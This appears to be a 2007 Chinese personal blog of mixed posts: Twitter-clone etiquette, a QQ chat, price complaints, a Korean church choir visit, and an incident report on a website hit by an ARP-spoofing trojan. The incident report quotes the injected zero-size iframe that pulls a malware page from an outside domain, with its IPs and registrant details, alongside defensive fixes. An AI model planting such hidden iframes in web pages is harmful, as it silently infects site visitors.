现在据说twitter很是火，随着国内IT大户QQ仿制twitter推出了滔滔（taotao.com）以后，国内的twitter们的竞争越来越激烈了。不过我认为国内twitter中最好的应该是叽歪.de了，其他名气和口碑还行的有“饭否”等。这里是六个Twitter中文克隆版功能对比表供参考，不过这个已经跟不上形势了，现在还出了豆瓣的广播、爱唠叨……几个后起之秀。

喜欢上twitter，还激活了我使用Gtalk的热情，因为原来Gtalk的好友不多，现在有个twitter，这样我就可以随时通过Gtalk使用twitter了，两个捆绑的如此之好，简直让人怀疑twitter是不是有心思等着以后被Google收购。

通过几个月的使用twitter，下面说说使用twitter（以及国内的twitter们）的几个用户应该遵守的规矩：

1、不要无病呻吟。虽然twitter以及国内twitter们的允许你随便说些什么，比如“吃饭咯”，“困了，睡觉了”，“ 下了一天的雨”……等等无聊无味的话，但是要知道随着使用时间的增加，一旦你有了个N个 Followers（跟随者）的话，那么你说的这些无聊的话对于他们无疑是折磨，或者突如其来的手机短信，或者突然蹦出的IM对话框……我就不堪忍受，先是在twitter中设置了加长了睡觉免打扰时间，后来干脆关闭了手机功能。但还是不能忍受上班的时候Gtalk的弹出的消息框，只好将某人remove了。因为twitter的社会化功能，所以您说的话不仅仅是自言自语，而还要考虑到别人的感受，至少他们根本不愿意接受无滋无味的“信”骚扰。除非她是您的亲密家属。

2、不要发炎频率过多。一天偶然接到朋友的twitter消息，如果也很有趣的话，也是件开心的事情。但是如果好友过多，每个人都频率过多，那么恐怕您就无暇做别的事情了，如果您还开通了手机接受，那么您手机就要爆了。同样道理，为了别人的感受，请节制“信”欲。

3、不要跟GOV唱反调。国外的twitter还好，没人管的了，没人会删你的感言或者粪言。但是会被GFW，比如不幸的zuola。国内的twitter们现在还不知道会不会有网管设置过滤关键字，或者删贴，或者其他的手段，但估计以后会象BBS、blog一样被管制、备案（好像没在叽歪.de看见备案证书？？）。同样的道理，为了保证这些网站能河蟹发展，即使不违反一个中心两个基本点四个基本原则，不反革命，不迷信，不色情……也不要随便说，其实说什么不该说什么，关键只有一句话：为了河蟹，不要跟GOV唱反调，比如“操你妈的北京，奥你妈的运！”。

一段QQ聊天记录：
----------------------------------------------------------------
   花裤头√ 18:05:45
啊 ， 对啦 花 你买房子了没。

 花儿与饭盒 18:05:53
没啊

     花裤头√ 18:06:11
没考虑吗？

 花儿与饭盒 18:07:52
没啊
 
    花裤头√ 18:08:18
哦。

    花裤头√ 18:08:37
怎么不呢？ 太贵了？

 花儿与饭盒 18:08:54
我等解放了以后再买房
 
    花裤头√ 18:09:22
呵呵。
----------------------------------------------------------------
南京的打车费起步价正式涨了1元，变成9元了，理由当然是国际油价上涨的缘故，可是奇怪的是，中石油的利润去年却突破1700亿！看不懂了，到底谁亏了？
猪肉也涨价了，政府也强硬说要限价，丫这就奇怪了，允许石油涨价，为什么不允许农民“发财”呢？
房价这两年一直是六部委、八部委打压、调控什么的，奇怪的是今年全国70个城市的平均房价仍然比去年上涨了6.3%！究竟真打压还是假打压？周正毅、陈良宇等人看不清的黑幕，让人猜想权力和房价之间的关系。
“解放全中国，人人有康居”毕竟只是戏言，城市低收入家庭毕竟还可以指盼，而我们这些“写字楼打工仔”呢？户籍准入制度使廉租房、经济适用房指望不上，商品房又高攀不上。
看看每年春运大军中，哪些是我们，哪些又是农民工？我们为什么非要回家？为什么我们淌汗流泪的城市容不下我们长久居住？
我们的希望在哪里？

2007年7月26日 南京·莫愁路堂  圣乐布道会

7月26日星期四晚，一个来自韩国的基督徒代表团来南京献唱。
这个代表团大约40多人，是由韩国梨花（黎花）女子大学、延世大学圣乐系大学生组成的合唱团，他们每年的寒暑假都来到中国各地进行宣教事工，带给我们中国信徒以激励和榜样。据说，今年已经是他们连续第10个年头到中国了，带队的李牧师和翻译的弟兄都是常带队来中国的老朋友。
不过大约这是他们第一次到南京来，今天他们一天先后去了圣保罗堂、金陵神学院、莫愁路堂等。
这个韩国大学生的唱诗班基本上都是以中文献唱，虽然中文不是特别标准，但气宇轩昂，歌声高亢优美。现场气氛非常热烈，很多时候都是台上台下一起高声赞美合唱！
晚上在莫愁路堂的献唱应该是他们一天最后一场演出了，据说晚饭都还没吃，不过唱得仍然底气十足，不晓得是唱功训练得出色呢，还是真正圣灵的感动。
早知道这么棒的演出，我应该早做准备的，比如录音录影之类的，唉，现场我只能用手机拍了几张。回头问问教堂看，他们赠给教会的光盘，能不能拷贝一份下来。
感谢主！感谢韩国弟兄姊妹的歌声！

----------------------------------------------------------------------------------------
P.S.1.网上查了一下，梨花女子大学和延世大学都是韩国赫赫有名的大学，梨花女大是韩国头牌女子大学，世界有名的基督教会学校，贵族学校。延世大学是韩国三大名校之一。
P.S.2.本来印象中以为韩国同中国一样作为东方国家，基督教文化不是很强，但现在据说，当飞机降临汉城的时候，你会看见下面房屋顶上满满的到处都是教堂、到处是十字架！这是羡慕！什么时候我可以到韩国去看看呢？

时间：
2007年7月27日星期五下午16点——18点。
症状：
当日16点左右网站和监管系统页面被嵌入
<iframe src='http://878772.cn/arp.htm' width=0 height=0></iframe>
同时症状显示调用该网站的两个JS脚本。
同时，同事发现局域网有arp攻击现象，显示为192.168.1.111机子在发送伪装arp欺骗包。
18点左右，木马症状消失。

检查：
在服务器上找特定文件，如网站后台登录页面： Admin_login.asp
1、在浏览器中源代码有
“<iframe src='http://878772.cn/arp.htm' width=0 height=0></iframe>”，但查看服务器上该文件没有该添加内容。
2、但admin/Admin_login.asp发现另一可疑内容：../iimages/……/.jss，但是未发现有“iimages”文件夹。这个可能是以前网站中马遗留下来的代码
已删除。
由于木马是当日16点左右出现，按时间查询，其他未发现网站asp、js等文件页面有改动迹象。

措施：
1、恢复网站文件备份；
2、打开网站防SQL注入功能开关。

分析：
1、该木马症状的奇怪处在于虽然发现页面有添加木马网站的调用链接，但未发现页面有添加代码的改动迹象。
2、由于同时发现我们局域网有arp攻击，后来在网上查询有说：
“如果是在局域网中，只要局域网中一台电脑中招其他电脑一上网就会连那个网站下载木马。昨天就处理了一个，原来是局域网中一个用户电脑裸奔，杀毒软件没升 级，系统补丁也没打，360安全卫士也没升级，气死了，结果中招。导致局域网中其他电脑受牵连。那台电脑中招后下载了N中木马，还有改卡巴斯基时间的真是 可恶！！”
“自动在每个网页上加了这么一段：
[color=Red]DoyouQihoo?ramesrc='http://878772.cn/arp.htm'width=0height=0></i-frame-X> [/color]”
  局域网中毒机器会有：
“好像在系统盘还释放了more.exe和x:\windows\more\....等几个病毒。”

3、局域网中某台电脑中了木马，造成局域网内的ARP欺骗，使得浏览网页时会自动在页面顶部加入 iframe 代码。

4、木马症状消失的原因，自然是局域网内中毒的那台机子关机下班了。

5、 域名：878772.cn
域名状态：:ok
域名联系人：李想
管理联系人电子邮件：jiuqiwuyejfja@163.com
                   jiuqiwuyejfja@163.com
所属注册商：北京新网数码信息技术有限公司
域名服务器：ns1.esindns.cn
域名服务器：ns2.esindns.cn
注册日期：2007-06-14 02:27
过期日期：2008-06-14 02:27

IP是60.190.223.103
真正的连接到外部的IP是美国的一个地址:  74.208.78.135


解决方法：
1、目前有效的办法就是局域网内机子安装antiarp和WindowsXP-KB925902-x86-CHS.exe补丁；
2、查找局域网内显示IP为192.168.1.111的机子，查杀病毒。
3、将域名：878772.cn、IP：60.190.223.103添加到浏览器“受限制站点”和hosts文件中（写法：127.0.0.1  878772.cn）。

小结：
这是挂马技术的新动向，从通过图片上传漏洞直接上传木马文件到通过SQL注入漏洞改写网站页面，添加script或iframe链接到外部木马网站，到现在利用局域网arp漏洞，导致局域网内浏览任何网站都被自动在页面顶部加入 iframe 代码。这样安全性能不高的机子就会中招。